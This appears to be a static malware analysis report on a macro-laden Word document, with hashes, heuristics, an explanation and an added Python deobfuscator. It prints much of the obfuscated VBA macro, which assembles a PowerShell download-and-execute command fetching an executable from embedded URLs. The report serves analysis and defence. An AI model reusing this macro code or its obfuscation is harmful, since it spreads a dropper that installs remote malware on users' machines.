Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1d75acd47f091308…

MALICIOUS

Office (OLE)

Size: 71.4 KB
Created: 2018-09-10 10:36:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 09a107540f8642214102c0a3b2535a71
SHA-1: 4eed5780032c8588a51a44970cbd391396217093
SHA-256: 1d75acd47f09130815e775996cbebcee9cc81e1d98c9f7ec0916fe9eb4381c30
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious OLE (Word) document whose VBA project contains a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled. The macro builds one long command line out of dozens of short string fragments: single characters are produced by Chr() arithmetic (Chr(9 + 4 + 0 + 7 + 79) is "c", Chr(6 + 2 + 0 + 5 + 54) is "C", Chr(3 + 1 + 0 + 2 + 28) is a double quote), the fragments are concatenated across several helper functions, and the code is padded with junk statements of the form Second "..." (calls to the built-in Second() function whose results are discarded and whose errors are swallowed by On Error Resume Next). The finished string is passed to Shell(). Evaluating the fragments shows that the command begins cmd /V/C"set yso=...: cmd is started with delayed variable expansion, and the value stored in yso is the real command written backwards and interleaved with caret (^) escape characters. Read backwards with the carets removed, it is PowerShell that creates a Net.WebClient, splits an '@'-separated list of URLs ($UiE), and for each URL in turn tries to download the file to $env:public\<number>.exe (here 320.exe) and run it with Invoke-Item, stopping at the first successful download. This is a download-and-execute stager for a second-stage executable; the URL list is only partially visible in the truncated macro listing below.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), i.e. it launches an external process; here the argument is the obfuscated cmd /V command assembled in the extracted script.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The VBA project has a Document_Open handler, so the macro runs automatically when the document is opened with macros enabled.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 73,088 bytes but its declared streams total only 36,753 bytes; the remaining 36,335 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). In this sample the observed delivery path is the macro, and the report does not characterise the slack content; carving that region and scanning it (for example for XOR-encoded PE headers) is a sensible follow-up before treating it as benign padding or deleted-stream residue.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into documents, not a network indicator. The download URLs used by the macro are assembled at run time from reversed string fragments, do not appear as plain text in the file, and were therefore not picked up by this heuristic.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6020 bytes
SHA-256: fb19174b22a30312f5c0eb216bac61f213f46a9c6e42efa687ece8861362589f

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iKLOuNFRN"
Function wqwnz()

On _
Error _
Resume _
Next
Second "Qz" + "134892806" + "XkYbIlQ" + "UO"
   Second "597" + "434181702" + "80186505" + "258310909"
wFVvTT = Format(Chr(9 + 4 + 0 + 7 + 79)) + "md " + "/V/" + Format(Chr(6 + 2 + 0 + 5 + 54)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "^" + "s^" + "e" + "t " + "y^s^o=" + "    ^ "
Second "KV" + "lu"
   Second "z" + "URzrD"
   Second "iDk" + "JFDkvIh" + "DvEoQjntvia" + "6118"
   Second "2365" + "u"
GcNNUfCUawQ = "^    ^ " + "^ ^  ^" + " ^ " + "^" + "  }^" + "}{h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "t"
Second "r" + "155583106" + "jVpK" + "SS"
   Second "JZZ" + "DzwJ"
   Second "6852" + "N"
ltjGrKz = "a" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^}" + "^;^ka^" + "erb;^A^" + "k^i^$^" + " " + "^m^" + "etI^-e"
Second "vWM" + "kWPj"
   Second "262290310" + "Vm" + "9965" + "HXzwFi"
   Second "6868" + "199732306"
   Second "FHGR" + "dErG"
   Second "SUS" + "mCV" + "a" + "zROj"
ZTnwEi = "kovn" + "^I;)^A^" + "ki^$^ ^" + ",^hs" + "^o" + "^$(e" + "liF^d^a" + "oln^w^" + "o"
Second "16022491" + "VQXtia" + "441950421" + "FYjT"
   Second "6943" + "hwFzd"
   Second "wY" + "E"
   Second "TWzDrcMjFjsib" + "wMnUOpP" + "tk" + "5193"
QLTmlV = "D^.ztB" + "^${^yr" + "^t" + "{)^E" + "i^U^" + "$ n^i" + "^ ^h^" + "s" + "o^$(^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "a^e"
Second "38777242" + "6917"
   Second "ItWj" + "jaHBaJuAWOkG"
   Second "MiFdPiSuQiIGP" + "GH"
qPRuYjkC = "r" + "^o^f;'" + "ex^e^" + "." + "^'+Ns^" + "l$+'\^'" + "^+"
Second "5680" + "290242265" + "pIl" + "tw"
   Second "DHcsl" + "ilsiHP"
   Second "AHzptY" + "N" + "rR" + "lSVWd"
dwhOzn = Format(Chr(9 + 4 + 0 + 7 + 79)) + "^i^l^b" + "^u^" + "p:vn^" + "e$=A^k^" + "i$^;" + "'0" + "2^3^" + "' =^ N" + "^s^" + "l^$;" + ")'^@^'("
wqwnz = wFVvTT + GcNNUfCUawQ + ltjGrKz + ZTnwEi + QLTmlV + qPRuYjkC + dwhOzn
   Second "tirU" + "Ds" + "1940" + "dD"
   Second "WXPLUPmT" + "BcU" + "vJkz" + "pSp"
End Function
Function sFQvT()

On _
Error _
Resume _
Next
Second "LpTl" + "290794446" + "MZiU" + "KrFW"
   Second "t" + "300692744" + "1594" + "O"
   Second "55027144" + "P" + "351730323" + "519982427"
RGwkaZ = "tilp^" + "S.'^T^e" + "^ydI^" + "tA/^s^" + "u"
Second "HQtOSBInERTAE" + "9362"
   Second "WQJFbY" + "kJ"
wfuDMBuSYjR = "^.ss^en" + "i" + "su^b" + "n^ag^i^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^im//" + ":" + "^ptt^h" + "@^"
Second "GPaUmTQRRawp" + "3362" + "214464197" + "X"
   Second "DrEX" + "uoswk" + "soKz" + "uGiP"
   Second "127366324" + "38" + "UpNUsVtjkIUF" + "vz"
   Second "3172" + "MWPK"
wUXfLuwooP = "l^G^h^" + "YU" + "^6zV" + "/^" + "mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^.^k" + "^ils^ak" + "^d^irg" + "n" + "^i//:" + "^"
Second "z" + "iVwD"
   Second "zSAoYi" + "B"
   Second "483084699" + "O" + "383246444" + "5972"
   Second "3855" + "wqjkmjtZkkkEv"
lcnDizQDHGp = "p^tth" + "^@Q^" + "e^" + "F" + "M^" + "A^xo0" + "65/mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + ".yt^l^" + "a"
Second "c" + "8806"
   Second "fsiMYfpowhV" + "8565"
   Second "tNEa" + "363209860"
BEZrj = "^" + "erem^o" + "^ha" + "^to^s^" + "ara^s//" + "^:^" + "ptth^@" + "^YY^9V" + "g" + "k^9" + "^" + "i^"
Second "wLcjPiXEYUv" + "DUOV" + "1873" + "BroEN"
QCuInBHqfdt = "q/^l^p^" + ".t^a" + "^iw" + "^k" + "^-o" + "ru^e//" + ":^"
Second "Y" + "2626" + "1471" + "90297257"
   Second "138642643" + "WjdW"
   Second "SbHjBww" + "413220236"
   Second "306" + "WtDJjLDmb"
lcninjqOil = "pt^th^" + "@X^F" + "^yF2^y" + "Kms/^t^" + "e" + "n^.ogi"
Second "nNwRSlwq" + "a" + "6484" + "tEIjMfvzb"
   Second "518766806" + "kHs" + "sztiAucPwkNZ" + "bhPbQ"
jPXtFclLkJV = "t" + "n^o" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "otn^e^" + "u" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "//^:" + "^ptth^" + "'=E^i^U" + "^" + "$;" + "^tne^i^" + "l" + Format(Chr(6 + 2 + 0 + 5 + 54)) + "^b^e" + "W^.t" + "^eN" + "^ ^"
Second "w" + "iUzuzFUaA" + "130395526" + "173316641"
QaMAIrLTwEC = "t" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^e" + "j^b^o-w" + "^e" + "n^" + "=ztB$ " + "l^l^e^"
Second "8973" + "451397177" + "vl" + "W"
   Second
... (truncated)
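To read the command the macro hands to Shell(), the string building has to be replayed: the Chr() arithmetic evaluated, the literals concatenated in assignment order, the junk Second calls ignored, and then the value stored in yso de-escaped and reversed. The Python below is an added example written for this report; it is not part of the sample and not part of the analysis tooling. Its input is the first builder function (wqwnz) copied from the extracted macros.bas above, with most of the junk Second lines dropped for brevity. The function names evaluate_vba_strings and decode_cmd_payload are the editor's; the variable name yso and the cmd /V/C"set prefix come from the evaluated strings, and the assumption that a plain caret strip plus reversal recovers the PowerShell is the editor's reading of the obfuscation scheme.

```python
import re

# Constructed input: the wqwnz() builder from the extracted macros.bas shown in
# this report, with most of the junk "Second ..." lines removed for brevity.
MACRO_SRC = r'''Attribute VB_Name = "iKLOuNFRN"
Function wqwnz()

On _
Error _
Resume _
Next
Second "Qz" + "134892806" + "XkYbIlQ" + "UO"
wFVvTT = Format(Chr(9 + 4 + 0 + 7 + 79)) + "md " + "/V/" + Format(Chr(6 + 2 + 0 + 5 + 54)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "^" + "s^" + "e" + "t " + "y^s^o=" + "    ^ "
   Second "z" + "URzrD"
GcNNUfCUawQ = "^    ^ " + "^ ^  ^" + " ^ " + "^" + "  }^" + "}{h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "t"
ltjGrKz = "a" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^}" + "^;^ka^" + "erb;^A^" + "k^i^$^" + " " + "^m^" + "etI^-e"
ZTnwEi = "kovn" + "^I;)^A^" + "ki^$^ ^" + ",^hs" + "^o" + "^$(e" + "liF^d^a" + "oln^w^" + "o"
QLTmlV = "D^.ztB" + "^${^yr" + "^t" + "{)^E" + "i^U^" + "$ n^i" + "^ ^h^" + "s" + "o^$(^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "a^e"
qPRuYjkC = "r" + "^o^f;'" + "ex^e^" + "." + "^'+Ns^" + "l$+'\^'" + "^+"
dwhOzn = Format(Chr(9 + 4 + 0 + 7 + 79)) + "^i^l^b" + "^u^" + "p:vn^" + "e$=A^k^" + "i$^;" + "'0" + "2^3^" + "' =^ N" + "^s^" + "l^$;" + ")'^@^'("
wqwnz = wFVvTT + GcNNUfCUawQ + ltjGrKz + ZTnwEi + QLTmlV + qPRuYjkC + dwhOzn
   Second "tirU" + "Ds" + "1940" + "dD"
End Function
'''

# An assignment line: identifier, '=', right-hand side. Junk "Second ..." lines,
# "On Error ..." and "End Function" do not match and are skipped.
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.*)$')

# Tokens on the right-hand side; '+' and whitespace are simply skipped.
TOKEN = re.compile(
    r'"([^"]*)"'                     # string literal (VBA has no backslash escapes)
    r'|Format\(Chr\(([^)]*)\)\)'     # Format(Chr(9 + 4 + ...)) -> one character
    r'|Chr\(([^)]*)\)'               # bare Chr(...)
    r'|([A-Za-z_]\w*)'               # reference to a variable assigned earlier
)


def evaluate_vba_strings(src):
    """Replay the macro's string building. Walks assignment lines in order,
    concatenating literals, Chr() arithmetic and previously assigned variables,
    and returns {variable name: resulting string}."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = []
        for literal, fmt_chr, bare_chr, ident in TOKEN.findall(rhs):
            expr = fmt_chr or bare_chr
            if expr:
                # Only integer sums are expected; refuse anything else rather than eval() it.
                if not re.fullmatch(r'[\d\s+]+', expr):
                    raise ValueError('unsupported Chr() argument: %r' % expr)
                parts.append(chr(sum(int(n) for n in expr.split('+'))))
            elif ident:
                parts.append(env.get(ident, ''))
            else:
                parts.append(literal)
        env[name] = ''.join(parts)
    return env


def decode_cmd_payload(command, var='yso'):
    """Undo the cmd-level obfuscation (editor's reading of the scheme). The Shell()
    argument has the shape  cmd /V/C"set <var>=<payload>...  where <payload> is the
    real command written backwards and sprinkled with '^' escape characters, which
    cmd's parser discards. Stripping the carets and reversing the text yields the
    command as it will eventually run. The listing is truncated, so the payload
    here is only the tail of the PowerShell one-liner."""
    cleaned = command.replace('^', '')
    marker = 'set %s=' % var
    idx = cleaned.find(marker)
    if idx < 0:
        raise ValueError('no delayed-expansion variable %r found' % var)
    payload = cleaned[idx + len(marker):]
    return payload[::-1].strip()


if __name__ == '__main__':
    strings = evaluate_vba_strings(MACRO_SRC)
    print('launcher:', strings['wFVvTT'].replace('^', ''))
    print('decoded :', decode_cmd_payload(strings['wqwnz']))
```

Running it prints the launcher prefix cmd /V/C"set yso= and the decoded tail of the PowerShell: the Split('@') of the URL list, $lsN = '320', the $env:public\320.exe drop path, and the foreach/try/DownloadFile/Invoke-Item/break loop. The remaining builder functions (sFQvT and the truncated ones) supply the front of the payload, including the URL list, and can be fed through the same two functions once the full macros.bas is in hand.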